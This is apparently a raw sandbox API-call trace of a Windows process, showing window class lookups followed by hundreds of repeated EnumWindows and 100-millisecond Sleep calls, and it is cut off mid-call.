EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0108.685] GetClassNameA (in: hWnd=0x100de, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0108.685] GetClassNameA (in: hWnd=0x10134, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0108.685] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0108.685] GetClassNameA (in: hWnd=0x10106, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.685] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.685] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.685] GetClassNameA (in: hWnd=0x10108, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.685] GetClassNameA (in: hWnd=0x10104, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.686] GetClassNameA (in: hWnd=0x10102, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0108.686] GetClassNameA (in: hWnd=0x10100, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.686] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0108.686] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0108.686] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x10ddfd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0108.686] Sleep (dwMilliseconds=0x64) [0108.844] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0108.845] Sleep (dwMilliseconds=0x64) [0109.267] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0109.267] Sleep (dwMilliseconds=0x64) [0109.377] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0109.378] Sleep (dwMilliseconds=0x64) [0109.485] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0109.485] Sleep (dwMilliseconds=0x64) [0109.626] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0109.626] Sleep (dwMilliseconds=0x64) [0109.753] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0109.753] Sleep (dwMilliseconds=0x64) [0109.907] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0109.907] Sleep (dwMilliseconds=0x64) [0110.031] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0110.032] Sleep (dwMilliseconds=0x64) [0110.174] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0110.174] Sleep (dwMilliseconds=0x64) [0110.340] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0110.340] Sleep (dwMilliseconds=0x64) [0110.509] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0110.511] Sleep (dwMilliseconds=0x64) [0110.625] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0110.626] Sleep (dwMilliseconds=0x64) [0110.829] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0110.829] Sleep (dwMilliseconds=0x64) [0110.938] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0110.939] Sleep (dwMilliseconds=0x64) [0111.076] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0111.077] Sleep (dwMilliseconds=0x64) [0111.189] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0111.189] Sleep (dwMilliseconds=0x64) [0111.331] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0111.331] Sleep (dwMilliseconds=0x64) [0111.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0111.441] Sleep (dwMilliseconds=0x64) [0111.559] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0111.559] Sleep (dwMilliseconds=0x64) [0111.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0111.723] Sleep (dwMilliseconds=0x64) [0111.844] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0111.844] Sleep (dwMilliseconds=0x64) [0111.955] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0111.955] Sleep (dwMilliseconds=0x64) [0112.092] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0112.092] Sleep (dwMilliseconds=0x64) [0112.219] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0112.220] Sleep (dwMilliseconds=0x64) [0112.329] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0112.330] Sleep (dwMilliseconds=0x64) [0112.438] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0112.438] Sleep (dwMilliseconds=0x64) [0112.604] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0112.605] Sleep (dwMilliseconds=0x64) [0112.780] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0112.780] Sleep (dwMilliseconds=0x64) [0112.979] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0112.980] Sleep (dwMilliseconds=0x64) [0113.103] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0113.104] Sleep (dwMilliseconds=0x64) [0113.230] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0113.230] Sleep (dwMilliseconds=0x64) [0113.353] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0113.356] Sleep (dwMilliseconds=0x64) [0113.482] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0113.482] Sleep (dwMilliseconds=0x64) [0113.644] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0113.644] Sleep (dwMilliseconds=0x64) [0113.750] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0113.750] Sleep (dwMilliseconds=0x64) [0113.950] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0113.951] Sleep (dwMilliseconds=0x64) [0114.261] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0114.261] Sleep (dwMilliseconds=0x64) [0114.375] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0114.375] Sleep (dwMilliseconds=0x64) [0114.498] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0114.498] Sleep (dwMilliseconds=0x64) [0114.632] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0114.633] Sleep (dwMilliseconds=0x64) [0114.744] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0114.744] Sleep (dwMilliseconds=0x64) [0114.884] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0114.884] Sleep (dwMilliseconds=0x64) [0115.009] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0115.009] Sleep (dwMilliseconds=0x64) [0115.140] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0115.140] Sleep (dwMilliseconds=0x64) [0115.249] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0115.249] Sleep (dwMilliseconds=0x64) [0115.357] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0115.357] Sleep (dwMilliseconds=0x64) [0115.464] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0115.464] Sleep (dwMilliseconds=0x64) [0115.668] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0115.668] Sleep (dwMilliseconds=0x64) [0115.789] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0115.790] Sleep (dwMilliseconds=0x64) [0115.992] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0115.992] Sleep (dwMilliseconds=0x64) [0116.102] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0116.103] Sleep (dwMilliseconds=0x64) [0116.234] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0116.235] Sleep (dwMilliseconds=0x64) [0116.381] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0116.382] Sleep (dwMilliseconds=0x64) [0116.509] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0116.510] Sleep (dwMilliseconds=0x64) [0116.712] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0116.712] Sleep (dwMilliseconds=0x64) [0116.840] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0116.840] Sleep (dwMilliseconds=0x64) [0116.946] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0116.947] Sleep (dwMilliseconds=0x64) [0117.098] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0117.098] Sleep (dwMilliseconds=0x64) [0117.222] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0117.222] Sleep (dwMilliseconds=0x64) [0117.427] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0117.427] Sleep (dwMilliseconds=0x64) [0117.541] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0117.541] Sleep (dwMilliseconds=0x64) [0117.665] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0117.665] Sleep (dwMilliseconds=0x64) [0117.941] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0117.942] Sleep (dwMilliseconds=0x64) [0118.062] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0118.062] Sleep (dwMilliseconds=0x64) [0118.222] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0118.223] Sleep (dwMilliseconds=0x64) [0118.419] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0118.419] Sleep (dwMilliseconds=0x64) [0118.530] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0118.530] Sleep (dwMilliseconds=0x64) [0118.648] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0118.648] Sleep (dwMilliseconds=0x64) [0118.839] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0118.841] Sleep (dwMilliseconds=0x64) [0118.948] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0118.949] Sleep (dwMilliseconds=0x64) [0119.104] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0119.104] Sleep (dwMilliseconds=0x64) [0119.230] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0119.230] Sleep (dwMilliseconds=0x64) [0119.386] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0119.387] Sleep (dwMilliseconds=0x64) [0119.495] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0119.495] Sleep (dwMilliseconds=0x64) [0119.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0119.692] Sleep (dwMilliseconds=0x64) [0119.841] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0119.841] Sleep (dwMilliseconds=0x64) [0120.163] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0120.164] Sleep (dwMilliseconds=0x64) [0120.284] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0120.285] Sleep (dwMilliseconds=0x64) [0120.417] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0120.417] Sleep (dwMilliseconds=0x64) [0120.606] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0120.607] Sleep (dwMilliseconds=0x64) [0120.717] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0120.718] Sleep (dwMilliseconds=0x64) [0120.843] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0120.844] Sleep (dwMilliseconds=0x64) [0120.995] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0120.996] Sleep (dwMilliseconds=0x64) [0121.107] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0121.108] Sleep (dwMilliseconds=0x64) [0121.247] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0121.248] Sleep (dwMilliseconds=0x64) [0121.356] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0121.357] Sleep (dwMilliseconds=0x64) [0121.487] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0121.487] Sleep (dwMilliseconds=0x64) [0121.625] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0121.625] Sleep (dwMilliseconds=0x64) [0121.783] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0121.783] Sleep (dwMilliseconds=0x64) [0121.949] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0121.949] Sleep (dwMilliseconds=0x64) [0122.066] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0122.066] Sleep (dwMilliseconds=0x64) [0122.256] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0122.256] Sleep (dwMilliseconds=0x64) [0122.437] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0122.437] Sleep (dwMilliseconds=0x64) [0122.574] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0122.574] Sleep (dwMilliseconds=0x64) [0122.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0122.707] Sleep (dwMilliseconds=0x64) [0122.856] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0122.856] Sleep (dwMilliseconds=0x64) [0122.988] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0122.988] Sleep (dwMilliseconds=0x64) [0123.200] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0123.200] Sleep (dwMilliseconds=0x64) [0123.339] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0123.340] Sleep (dwMilliseconds=0x64) [0123.450] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0123.450] Sleep (dwMilliseconds=0x64) [0123.574] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0123.575] Sleep (dwMilliseconds=0x64) [0123.713] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0123.713] Sleep (dwMilliseconds=0x64) [0123.940] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0123.941] Sleep (dwMilliseconds=0x64) [0124.120] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0124.120] Sleep (dwMilliseconds=0x64) [0124.229] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0124.229] Sleep (dwMilliseconds=0x64) [0124.403] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0124.403] Sleep (dwMilliseconds=0x64) [0124.510] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0124.510] Sleep (dwMilliseconds=0x64) [0124.636] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0124.636] Sleep (dwMilliseconds=0x64) [0124.846] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0124.866] Sleep (dwMilliseconds=0x64) [0124.983] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0124.983] Sleep (dwMilliseconds=0x64) [0125.172] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0125.172] Sleep (dwMilliseconds=0x64) [0125.293] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0125.293] Sleep (dwMilliseconds=0x64) [0125.438] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0125.439] Sleep (dwMilliseconds=0x64) [0125.590] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0125.590] Sleep (dwMilliseconds=0x64) [0125.728] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0125.729] Sleep (dwMilliseconds=0x64) [0126.027] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0126.027] Sleep (dwMilliseconds=0x64) [0126.232] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0126.232] Sleep (dwMilliseconds=0x64) [0126.344] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0126.345] Sleep (dwMilliseconds=0x64) [0126.509] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0126.509] Sleep (dwMilliseconds=0x64) [0126.637] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0126.637] Sleep (dwMilliseconds=0x64) [0126.777] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0126.777] Sleep (dwMilliseconds=0x64) [0126.933] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0126.933] Sleep (dwMilliseconds=0x64) [0127.041] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0127.042] Sleep (dwMilliseconds=0x64) [0127.275] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0127.276] Sleep (dwMilliseconds=0x64) [0127.448] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0127.449] Sleep (dwMilliseconds=0x64) [0127.560] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0127.561] Sleep (dwMilliseconds=0x64) [0127.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0127.677] Sleep (dwMilliseconds=0x64) [0127.792] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0127.793] Sleep (dwMilliseconds=0x64) [0128.001] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0128.001] Sleep (dwMilliseconds=0x64) [0128.201] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0128.202] Sleep (dwMilliseconds=0x64) [0128.335] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0128.335] Sleep (dwMilliseconds=0x64) [0128.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0128.442] Sleep (dwMilliseconds=0x64) [0128.596] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0128.596] Sleep (dwMilliseconds=0x64) [0128.734] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0128.734] Sleep (dwMilliseconds=0x64) [0128.894] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0128.894] Sleep (dwMilliseconds=0x64) [0129.002] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0129.003] Sleep (dwMilliseconds=0x64) [0131.333] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0131.333] Sleep (dwMilliseconds=0x64) [0131.445] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0131.446] Sleep (dwMilliseconds=0x64) [0131.595] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0131.595] Sleep (dwMilliseconds=0x64) [0131.705] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0131.705] Sleep (dwMilliseconds=0x64) [0131.875] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0131.876] Sleep (dwMilliseconds=0x64) [0131.992] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0131.992] Sleep (dwMilliseconds=0x64) [0132.150] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0132.150] Sleep (dwMilliseconds=0x64) [0132.313] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0132.313] Sleep (dwMilliseconds=0x64) [0132.579] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0132.579] Sleep (dwMilliseconds=0x64) [0132.718] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0132.719] Sleep (dwMilliseconds=0x64) [0132.917] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0132.917] Sleep (dwMilliseconds=0x64) [0133.026] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0133.026] Sleep (dwMilliseconds=0x64) [0133.194] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0133.194] Sleep (dwMilliseconds=0x64) [0133.324] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0133.324] Sleep (dwMilliseconds=0x64) [0133.443] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0133.443] Sleep (dwMilliseconds=0x64) [0133.605] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0133.605] Sleep (dwMilliseconds=0x64) [0133.731] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0133.731] Sleep (dwMilliseconds=0x64) [0133.870] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0133.870] Sleep (dwMilliseconds=0x64) [0134.055] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0134.055] Sleep (dwMilliseconds=0x64) [0134.189] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0134.190] Sleep (dwMilliseconds=0x64) [0134.339] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0134.340] Sleep (dwMilliseconds=0x64) [0134.465] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0134.466] Sleep (dwMilliseconds=0x64) [0134.573] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0134.574] Sleep (dwMilliseconds=0x64) [0134.728] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0134.729] Sleep (dwMilliseconds=0x64) [0134.862] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0134.862] Sleep (dwMilliseconds=0x64) [0135.018] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0135.019] Sleep (dwMilliseconds=0x64) [0135.145] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0135.145] Sleep (dwMilliseconds=0x64) [0135.364] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0135.365] Sleep (dwMilliseconds=0x64) [0135.484] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0135.485] Sleep (dwMilliseconds=0x64) [0135.716] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0135.716] Sleep (dwMilliseconds=0x64) [0135.839] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0135.840] Sleep (dwMilliseconds=0x64) [0135.948] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0135.948] Sleep (dwMilliseconds=0x64) [0136.121] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0136.122] Sleep (dwMilliseconds=0x64) [0136.249] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0136.249] Sleep (dwMilliseconds=0x64) [0136.357] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0136.357] Sleep (dwMilliseconds=0x64) [0136.497] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0136.497] Sleep (dwMilliseconds=0x64) [0136.634] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0136.635] Sleep (dwMilliseconds=0x64) [0136.775] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0136.775] Sleep (dwMilliseconds=0x64) [0136.946] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0136.946] Sleep (dwMilliseconds=0x64) [0137.074] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0137.074] Sleep (dwMilliseconds=0x64) [0137.384] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0137.384] Sleep (dwMilliseconds=0x64) [0137.531] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0137.532] Sleep (dwMilliseconds=0x64) [0137.696] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0137.696] Sleep (dwMilliseconds=0x64) [0137.826] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0137.826] Sleep (dwMilliseconds=0x64) [0137.977] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0137.977] Sleep (dwMilliseconds=0x64) [0138.120] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0138.120] Sleep (dwMilliseconds=0x64) [0138.294] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0138.294] Sleep (dwMilliseconds=0x64) [0138.493] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0138.493] Sleep (dwMilliseconds=0x64) [0138.603] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0138.604] Sleep (dwMilliseconds=0x64) [0138.722] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0138.722] Sleep (dwMilliseconds=0x64) [0138.887] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0138.887] Sleep (dwMilliseconds=0x64) [0138.997] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0138.997] Sleep (dwMilliseconds=0x64) [0139.103] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0139.103] Sleep (dwMilliseconds=0x64) [0139.289] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0139.289] Sleep (dwMilliseconds=0x64) [0139.404] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0139.405] Sleep (dwMilliseconds=0x64) [0139.512] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0139.512] Sleep (dwMilliseconds=0x64) [0139.635] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0139.635] Sleep (dwMilliseconds=0x64) [0139.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0139.801] Sleep (dwMilliseconds=0x64) [0139.930] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0139.931] Sleep (dwMilliseconds=0x64) [0140.190] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.191] Sleep (dwMilliseconds=0x64) [0140.305] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.306] Sleep (dwMilliseconds=0x64) [0140.461] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.461] Sleep (dwMilliseconds=0x64) [0140.581] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.582] Sleep (dwMilliseconds=0x64) [0140.587] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.587] Sleep (dwMilliseconds=0x64) [0140.681] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.681] Sleep (dwMilliseconds=0x64) [0140.822] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.822] Sleep (dwMilliseconds=0x64) [0140.885] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.885] Sleep (dwMilliseconds=0x64) [0140.909] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.910] Sleep (dwMilliseconds=0x64) [0140.916] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.917] Sleep (dwMilliseconds=0x64) [0140.939] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.940] Sleep (dwMilliseconds=0x64) [0140.954] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0140.954] Sleep (dwMilliseconds=0x64) [0141.055] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.056] Sleep (dwMilliseconds=0x64) [0141.109] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.109] Sleep (dwMilliseconds=0x64) [0141.120] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.121] Sleep (dwMilliseconds=0x64) [0141.133] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.134] Sleep (dwMilliseconds=0x64) [0141.150] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.150] Sleep (dwMilliseconds=0x64) [0141.164] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.165] Sleep (dwMilliseconds=0x64) [0141.242] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.243] Sleep (dwMilliseconds=0x64) [0141.315] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.315] Sleep (dwMilliseconds=0x64) [0141.354] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.355] Sleep (dwMilliseconds=0x64) [0141.465] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.466] Sleep (dwMilliseconds=0x64) [0141.509] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.510] Sleep (dwMilliseconds=0x64) [0141.532] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.533] Sleep (dwMilliseconds=0x64) [0141.542] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.543] Sleep (dwMilliseconds=0x64) [0141.557] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.557] Sleep (dwMilliseconds=0x64) [0141.580] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.580] Sleep (dwMilliseconds=0x64) [0141.617] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.617] Sleep (dwMilliseconds=0x64) [0141.726] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.726] Sleep (dwMilliseconds=0x64) [0141.791] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0141.792] Sleep 